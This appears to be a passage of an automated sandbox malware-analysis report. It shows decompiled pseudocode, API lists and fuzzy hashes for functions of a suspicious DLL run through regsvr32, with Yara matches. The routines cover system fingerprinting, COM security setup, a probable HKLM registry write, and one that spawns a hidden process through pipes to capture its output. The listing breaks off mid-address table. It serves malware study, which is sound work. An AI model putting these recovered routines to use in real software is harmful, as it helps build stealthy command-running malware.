                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x1930590
					_t125 =  *0x1001e68c; // 0x19afc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x1930590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x1930590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x1930590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x1930590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x19307b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x1930590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x19afaa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x19afaa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}































































                            0x10004a0b
                            0x10004a18
                            0x10004a23
                            0x10004a28
                            0x10004a2a
                            0x10004a2d
                            0x10004a32
                            0x10004a35
                            0x10004a3f
                            0x10004a41
                            0x10004a4e
                            0x10004a57
                            0x10004a57
                            0x10004a64
                            0x10004a7f
                            0x10004a86
                            0x10004a88
                            0x10004a8d
                            0x10004a92
                            0x10004a98
                            0x10004aa7
                            0x10004ac6
                            0x10004ac8
                            0x10004ace
                            0x10004ad4
                            0x10004ad9
                            0x10004add
                            0x10004ae0
                            0x10004aea
                            0x10004aec
                            0x10004aed
                            0x10004af8
                            0x10004afa
                            0x10004afd
                            0x10004b02
                            0x10004b09
                            0x10004b5e
                            0x10004b5e
                            0x10004b63
                            0x10004bca
                            0x10004bcf
                            0x10004bd1
                            0x10004bdb
                            0x10004be0
                            0x10004be0
                            0x10004bfa
                            0x10004bfc
                            0x10004bff
                            0x10004c01
                            0x00000000
                            0x00000000
                            0x10004c07
                            0x10004c11
                            0x10004c1a
                            0x10004c1f
                            0x10004c22
                            0x10004c28
                            0x10004c2e
                            0x10004c36
                            0x10004c38
                            0x10004c3b
                            0x10004c3c
                            0x10004c41
                            0x10004c44
                            0x10004c47
                            0x10004c49
                            0x10004c4d
                            0x10004c4d
                            0x10004c52
                            0x10004c55
                            0x10004c57
                            0x10004c5b
                            0x10004c5b
                            0x10004c62
                            0x10004c67
                            0x10004c69
                            0x10004c6d
                            0x10004c6f
                            0x10004c75
                            0x10004c79
                            0x10004c7c
                            0x10004c7d
                            0x10004c82
                            0x10004c85
                            0x10004c8a
                            0x10004cb2
                            0x10004cb8
                            0x10004cbf
                            0x10004cce
                            0x10004cd3
                            0x00000000
                            0x10004cd3
                            0x10004cc1
                            0x00000000
                            0x10004c8c
                            0x10004c8c
                            0x10004c91
                            0x10004c98
                            0x10004cdd
                            0x10004cdd
                            0x10004ce4
                            0x10004ce8
                            0x10004ce9
                            0x10004ce9
                            0x10004cf3
                            0x10004cf8
                            0x10004cfb
                            0x10004cfc
                            0x10004cfe
                            0x10004d00
                            0x10004d05
                            0x10004d0c
                            0x10004d4f
                            0x10004d0e
                            0x10004d13
                            0x10004d1b
                            0x10004d1f
                            0x10004d2a
                            0x10004d35
                            0x10004d3d
                            0x10004d41
                            0x10004d49
                            0x10004d49
                            0x10004d0c
                            0x10004d55
                            0x10004d58
                            0x10004d5a
                            0x10004d60
                            0x10004d60
                            0x10004d62
                            0x10004d62
                            0x00000000
                            0x10004d62
                            0x10004c9a
                            0x10004c9a
                            0x10004ca0
                            0x10004ca2
                            0x10004ca7
                            0x10004ca7
                            0x10004ca9
                            0x10004cd8
                            0x00000000
                            0x10004cd8
                            0x10004cab
                            0x10004ae4
                            0x10004ae4
                            0x00000000
                            0x10004ae4
                            0x10004c8a
                            0x10004b69
                            0x10004b77
                            0x10004b8a
                            0x10004b8f
                            0x10004b95
                            0x10004b97
                            0x10004baf
                            0x10004bb4
                            0x10004bbd
                            0x10004bc3
                            0x00000000
                            0x10004bc3
                            0x10004b9f
                            0x10004ba8
                            0x00000000
                            0x10004ba8
                            0x10004b0b
                            0x10004b11
                            0x10004b13
                            0x10004b51
                            0x10004b53
                            0x00000000
                            0x00000000
                            0x10004b55
                            0x10004b59
                            0x00000000
                            0x10004b59
                            0x10004b15
                            0x10004b1f
                            0x10004b2b
                            0x10004b36
                            0x10004b3d
                            0x10004b47
                            0x10004b4c
                            0x00000000
                            0x10004b4c
                            0x10004ae2
                            0x00000000
                            0x10004a66
                            0x10004a71
                            0x10004a77
                            0x10004a79
                            0x10004d64
                            0x10004d64
                            0x10004d66
                            0x10004d6c
                            0x10004d6c
                            0x00000000
                            0x10004a79

                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset
                            • String ID:
                            • API String ID: 1985475764-0
                            • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                            • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                            • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                            • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                            • SysAllocString.OLEAUT32(?), ref: 1000D764
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D778
                            • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                            • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                            • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                            • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                            • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                            • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: @$\u%04X$\u%04X\u%04X
                            • API String ID: 0-2132903582
                            • Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                            • Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
                            • Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
                            • Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 30%
                            			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                            0x1000d530
                            0x1000d533
                            0x1000d536
                            0x1000d547
                            0x1000d54d
                            0x1000d55e
                            0x1000d566
                            0x1000d5b7
                            0x1000d5b7
                            0x1000d5bc
                            0x1000d5c1
                            0x1000d5c1
                            0x1000d5c4
                            0x1000d5c9
                            0x1000d5ce
                            0x1000d5ce
                            0x1000d5d1
                            0x1000d568
                            0x1000d569
                            0x1000d56f
                            0x1000d580
                            0x1000d585
                            0x00000000
                            0x1000d587
                            0x1000d594
                            0x1000d59c
                            0x00000000
                            0x1000d59e
                            0x1000d5a0
                            0x1000d5a8
                            0x00000000
                            0x1000d5aa
                            0x1000d5ad
                            0x1000d5b3
                            0x1000d5b3
                            0x1000d5a8
                            0x1000d59c
                            0x1000d585
                            0x1000d5d6

                            APIs
                            • CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                            • CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                            • SysAllocString.OLEAUT32(00000000), ref: 1000D569
                            • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                            • String ID:
                            • API String ID: 2855449287-0
                            • Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                            • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                            • Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
                            • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}











                            0x100121ff
                            0x10012207
                            0x1001220c
                            0x1001220f
                            0x10012214
                            0x1001221a
                            0x10012223
                            0x10012227
                            0x10012227
                            0x10012223
                            0x10012229
                            0x1001222e
                            0x10012237
                            0x1001223c
                            0x1001223f
                            0x10012248
                            0x1001224a
                            0x10012251
                            0x10012262
                            0x10012262
                            0x10012264
                            0x1001226c
                            0x10012273
                            0x00000000
                            0x1001226e
                            0x10012272
                            0x10012272
                            0x10012253
                            0x10012253
                            0x10012259
                            0x1001225b
                            0x10012260
                            0x10012276
                            0x10012279
                            0x1001227e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x10012260

                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: _errno$localeconvstrchrstrtod
                            • String ID:
                            • API String ID: 1035490122-0
                            • Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                            • Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
                            • Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
                            • Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x1930590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x1931bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x19307b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x19307b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








                            0x1000cf87
                            0x1000cf89
                            0x1000cf90
                            0x1000cf98
                            0x1000cfa2
                            0x1000cfa2
                            0x1000cfa8
                            0x1000cfb1
                            0x1000cfb7
                            0x1000cfb9
                            0x1000cfbd
                            0x1000cfbd
                            0x1000cfc2
                            0x1000cfc8
                            0x1000cfd8
                            0x1000cfe2
                            0x1000cfea
                            0x1000cfed
                            0x1000cff9
                            0x1000cfff
                            0x1000d004
                            0x1000d00a
                            0x1000d010
                            0x1000d016
                            0x1000d01e

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,01930590,?,10003545), ref: 1000CF90
                            • GetModuleFileNameW.KERNEL32(00000000,01931BD4,00000105,?,?,01930590,?,10003545), ref: 1000CFB1
                            • memset.MSVCRT ref: 1000CFE2
                            • GetVersionExA.KERNEL32(01930590,01930590,?,10003545), ref: 1000CFED
                            • GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$FileModuleNameVersionmemset
                            • String ID:
                            • API String ID: 3581039275-0
                            • Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                            • Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
                            • Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
                            • Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177pipeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x19afaa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x19afaa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x19afaa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x19afaa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x19afaa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x19afaa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x19afc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x19afaa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x19afaa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}




































                            0x1000a9c2
                            0x1000a9c4
                            0x1000a9d0
                            0x1000a9d5
                            0x1000a9d8
                            0x1000a9da
                            0x1000a9dd
                            0x1000a9e0
                            0x1000a9e7
                            0x1000a9ea
                            0x1000a9f1
                            0x1000a9f4
                            0x1000a9fe
                            0x1000a9ff
                            0x1000aa02
                            0x1000aa04
                            0x1000aa05
                            0x1000aa1c
                            0x1000ab9c
                            0x00000000
                            0x1000ab9c
                            0x1000aa33
                            0x1000ab68
                            0x1000ab6e
                            0x1000ab79
                            0x1000ab7b
                            0x1000ab83
                            0x1000ab83
                            0x1000ab8a
                            0x1000ab8c
                            0x1000ab95
                            0x1000ab95
                            0x00000000
                            0x1000ab98
                            0x1000aa39
                            0x1000aa3c
                            0x1000aa3f
                            0x1000aa45
                            0x1000aa4f
                            0x1000aa59
                            0x1000aa60
                            0x1000aa69
                            0x1000aa6b
                            0x1000aa71
                            0x00000000
                            0x00000000
                            0x1000aa7c
                            0x1000aa83
                            0x1000aa84
                            0x1000aa89
                            0x1000aa8a
                            0x1000aa8b
                            0x1000aa90
                            0x1000aa92
                            0x1000aa93
                            0x1000aa94
                            0x1000aa97
                            0x1000aa9d
                            0x00000000
                            0x00000000
                            0x1000aaa3
                            0x1000aaab
                            0x1000aaae
                            0x1000aab6
                            0x1000aab9
                            0x1000aabc
                            0x1000aac2
                            0x1000aad6
                            0x1000aadc
                            0x1000aae2
                            0x1000ab0b
                            0x1000aae4
                            0x1000aae4
                            0x1000aae6
                            0x1000aae8
                            0x1000aaf0
                            0x1000aaf8
                            0x1000aafd
                            0x1000aafd
                            0x1000ab11
                            0x1000ab13
                            0x1000ab13
